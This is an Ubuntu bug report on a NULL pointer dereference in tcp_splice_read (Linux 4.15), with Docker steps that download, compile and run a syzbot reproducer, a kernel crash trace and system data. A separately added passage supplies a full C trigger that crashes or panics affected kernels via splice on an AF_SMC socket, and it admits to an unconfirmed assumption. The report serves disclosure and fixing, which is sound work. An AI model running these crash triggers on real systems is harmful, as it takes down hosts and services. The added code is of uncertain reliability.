NULL pointer dereference in tcp_splice_read

Bug #1953520 reported by Dmitry Nagornykh
Affects: linux (Ubuntu)
Status: Confirmed
Importance: Undecided
Assigned to: Unassigned

Bug Description

A NULL pointer dereference was discovered in “tcp_splice_read”. The problem was originally found by syzbot, https://syzkaller.appspot.com/bug?id=506214c97a1af183589a4caf4a8fa162a9f56cbd. It is reproduced by the root user in a Docker container or on the host on Ubuntu 18.04.6 LTS with Linux 4.15.0-163-generic. It is also reproduced on Ubuntu 18.04.6 LTS with Linux Ubuntu-4.15.0-164.172.
The bug reproducer is built from https://raw.githubusercontent.com/dvyukov/syzkaller-repros/master/linux/506214c97a1af183589a4caf4a8fa162a9f56cbd.c. It does not reproduce on Ubuntu 20.04.3 LTS with Linux 5.4.0-91-generic or on Linux mainline v5.16-rc4. Mainline commit 07603b230895 (ChangeLog-5.1), which propagates the file from the SMC to the TCP socket, fixes the issue.

Steps to reproduce in a Docker container:
-----------------------------------------------------------
docker pull ubuntu
docker run -ti ubuntu bash
apt update
apt install gcc wget
wget https://raw.githubusercontent.com/dvyukov/syzkaller-repros/master/linux/506214c97a1af183589a4caf4a8fa162a9f56cbd.c
gcc ./506214c97a1af183589a4caf4a8fa162a9f56cbd.c -static -pthread -o 506214c97a1af183589a4caf4a8fa162a9f56cbd
./506214c97a1af183589a4caf4a8fa162a9f56cbd

The resulting kernel crash:
----------------------------------------
root@2d6b356e151a:/# ./506214c97a1af183589a4caf4a8fa162a9f56cbd
BUG: unable to handle kernel NULL pointer dereference at 0000000000000041
IP: tcp_splice_read+0x5f/0x2b0
PGD 8000000133bd3067 P4D 8000000133bd3067 PUD 12e34b067 PMD 0
Oops: 0000 [#1] SMP PTI
Dumping ftrace buffer:
   (ftrace buffer empty)
Modules linked in: smc veth xt_conntrack ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo xt_addrtype iptable_filter iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack br_netfilter bridge t
 sysimgblt aesni_intel fb_sys_fops aes_x86_64 crypto_simd glue_helper cryptd psmouse drm floppy e1000 virtio_blk pata_acpi i2c_piix4
CPU: 1 PID: 4601 Comm: 506214c97a1af18 Not tainted 4.15.0-163-generic #171-Ubuntu
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
RIP: 0010:tcp_splice_read+0x5f/0x2b0
RSP: 0018:ffffb50cc381fdb0 EFLAGS: 00010246
RAX: 0000000000000000 RBX: ffff9079f86952c0 RCX: 0000000000010000
RDX: 0000000000000000 RSI: 00000000fffffe01 RDI: ffffffff95e523a0
RBP: ffffb50cc381fe20 R08: 0000000000000002 R09: ffffffffc096e2c0
R10: 0000000000000000 R11: 0000000000000000 R12: ffff9079f1af7c40
R13: ffffffffffffffe3 R14: ffff9079edeebbd8 R15: 0000000000010000
FS: 0000000001a56880(0000) GS:ffff9079ffd00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000041 CR3: 00000001309b2001 CR4: 0000000000360ee0
Call Trace:
 smc_splice_read+0x96/0xa0 [smc]
 sock_splice_read+0x25/0x30
 do_splice_to+0x79/0x90
 SyS_splice+0x6dd/0x730
 do_syscall_64+0x73/0x130
 entry_SYSCALL_64_after_hwframe+0x41/0xa6
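The call trace above ends in tcp_splice_read() reached through smc_splice_read(), and CR2 = 0x41 is a small offset from NULL, consistent with a field being read through a NULL struct pointer (tcp_splice_read reads sock->file, which the fix the reporter names attaches to the internal TCP socket). The program below is an added example, written here and not the syzbot reproducer linked above nor anything from the report; it exercises the same path with a plain splice(2) on an AF_SMC socket. It assumes, which the page does not state, that an AF_SMC socket connected to a peer without SMC support falls back to its internal TCP socket, the state in which smc_splice_read forwards to tcp_splice_read. On an affected kernel the process never returns and, with the reporter's oops=panic command line, the host panics, so run it only in a disposable VM; on a fixed kernel splice() returns (-EAGAIN, since the socket is set non-blocking), and where AF_SMC is unavailable the program says so and exits.

```c
#define _GNU_SOURCE          /* splice(2) and SPLICE_F_NONBLOCK */
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef AF_SMC
#define AF_SMC 43            /* value from linux/socket.h, for older libc headers */
#endif

/* Outcomes of run_repro(); an affected kernel produces none of them (it oopses). */
enum repro_result {
    REPRO_SETUP_FAILED = -1, /* no loopback listener, connection or pipe */
    REPRO_NO_SMC = 0,        /* socket(AF_SMC) refused: no smc support to exercise */
    REPRO_SURVIVED = 1,      /* splice() returned, so this kernel is not affected */
};

/* Plain TCP listener on 127.0.0.1; the kernel picks the port and addr receives it. */
static int make_loopback_listener(struct sockaddr_in *addr)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    socklen_t len = sizeof(*addr);

    if (fd < 0)
        return -1;
    memset(addr, 0, sizeof(*addr));
    addr->sin_family = AF_INET;
    addr->sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(fd, (struct sockaddr *)addr, len) < 0 || listen(fd, 1) < 0 ||
        getsockname(fd, (struct sockaddr *)addr, &len) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/*
 * Drive splice(2) into tcp_splice_read() through an AF_SMC socket:
 *   sys_splice -> do_splice_to -> sock_splice_read -> smc_splice_read -> tcp_splice_read
 * Returns an enum repro_result; on an affected kernel it does not return.
 */
int run_repro(void)
{
    struct sockaddr_in addr;
    int pfd[2] = { -1, -1 };
    int rc = REPRO_SETUP_FAILED;
    int lfd, smc, fl;
    ssize_t n;

    lfd = make_loopback_listener(&addr);
    if (lfd < 0)
        return REPRO_SETUP_FAILED;

    smc = socket(AF_SMC, SOCK_STREAM, 0);
    if (smc < 0) {
        /* Typically EAFNOSUPPORT: no smc module present and none autoloaded. */
        close(lfd);
        return REPRO_NO_SMC;
    }

    /* Assumption: the peer is plain TCP, so the SMC handshake cannot complete and
     * the SMC socket falls back to its internal TCP socket (the smc_splice_read
     * path seen in the trace). */
    if (connect(smc, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        goto out;
    /* Non-blocking, so an unaffected kernel returns -EAGAIN instead of waiting for data. */
    fl = fcntl(smc, F_GETFL);
    if (fl < 0 || fcntl(smc, F_SETFL, fl | O_NONBLOCK) < 0 || pipe(pfd) < 0)
        goto out;

    n = splice(smc, NULL, pfd[1], NULL, 4096, SPLICE_F_NONBLOCK);
    if (n < 0)
        printf("splice: %s (kernel survived)\n", strerror(errno));
    else
        printf("splice: %zd bytes (kernel survived)\n", n);
    rc = REPRO_SURVIVED;
out:
    if (pfd[0] >= 0) {
        close(pfd[0]);
        close(pfd[1]);
    }
    close(smc);
    close(lfd);
    return rc;
}

int main(void)
{
    int rc = run_repro();

    if (rc == REPRO_NO_SMC)
        puts("AF_SMC not available on this kernel; nothing to test");
    else if (rc == REPRO_SETUP_FAILED)
        perror("setup failed");
    return rc < 0;
}
```

Build with `gcc -O2 -o smc_splice smc_splice.c`; no SMC-capable peer or RDMA hardware is needed, because the point of the trigger is precisely that the SMC socket has fallen back to TCP. Note that socket(AF_SMC) can cause the kernel to autoload the smc module even when the caller is root inside a container, which is why the report shows the crash from inside Docker.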

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: linux-image-4.15.0-163-generic 4.15.0-163.171
ProcVersionSignature: Ubuntu 4.15.0-163.171-generic 4.15.18
Uname: Linux 4.15.0-163-generic x86_64
AlsaDevices:
 total 0
 crw-rw---- 1 root audio 116, 1 Dec 7 15:27 seq
 crw-rw---- 1 root audio 116, 33 Dec 7 15:27 timer
AplayDevices: Error: [Errno 2] No such file or directory: 'aplay': 'aplay'
ApportVersion: 2.20.9-0ubuntu7.27
Architecture: amd64
ArecordDevices: Error: [Errno 2] No such file or directory: 'arecord': 'arecord'
AudioDevicesInUse: Error: command ['fuser', '-v', '/dev/snd/seq', '/dev/snd/timer'] failed with exit code 1:
Date: Tue Dec 7 15:28:46 2021
InstallationDate: Installed on 2021-11-29 (7 days ago)
InstallationMedia: Ubuntu-Server 18.04.6 LTS "Bionic Beaver" - Release amd64 (20210915)
IwConfig: Error: [Errno 2] No such file or directory: 'iwconfig': 'iwconfig'
Lsusb: Error: command ['lsusb'] failed with exit code 1:
MachineType: QEMU Standard PC (i440FX + PIIX, 1996)
PciMultimedia:

ProcEnviron:
 TERM=vt220
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
ProcFB: 0 bochsdrmfb
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-4.15.0-163-generic root=UUID=8688c2d4-18cc-4c67-b9a9-dc3d4f4ed3f2 ro console=ttyS0 oops=panic panic=86400 ftrace_dump_on_oops=orig_cpu slub_debug=FZ maybe-ubiquity crashkernel=512M-:192M
RelatedPackageVersions:
 linux-restricted-modules-4.15.0-163-generic N/A
 linux-backports-modules-4.15.0-163-generic N/A
 linux-firmware 1.173.20
RfKill: Error: [Errno 2] No such file or directory: 'rfkill': 'rfkill'
SourcePackage: linux
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/01/2014
dmi.bios.vendor: SeaBIOS
dmi.bios.version: 1.13.0-1ubuntu1.1
dmi.chassis.type: 1
dmi.chassis.vendor: QEMU
dmi.chassis.version: pc-i440fx-focal
dmi.modalias: dmi:bvnSeaBIOS:bvr1.13.0-1ubuntu1.1:bd04/01/2014:svnQEMU:pnStandardPC(i440FX+PIIX,1996):pvrpc-i440fx-focal:cvnQEMU:ct1:cvrpc-i440fx-focal:
dmi.product.name: Standard PC (i440FX + PIIX, 1996)
dmi.product.version: pc-i440fx-focal
dmi.sys.vendor: QEMU

Dmitry Nagornykh (dnn81) wrote :
information type: Private Security → Public Security

Ubuntu Kernel Bot (ubuntu-kernel-bot) wrote : Status changed to Confirmed

This change was made by a bot.

Changed in linux (Ubuntu):
status: New → Confirmed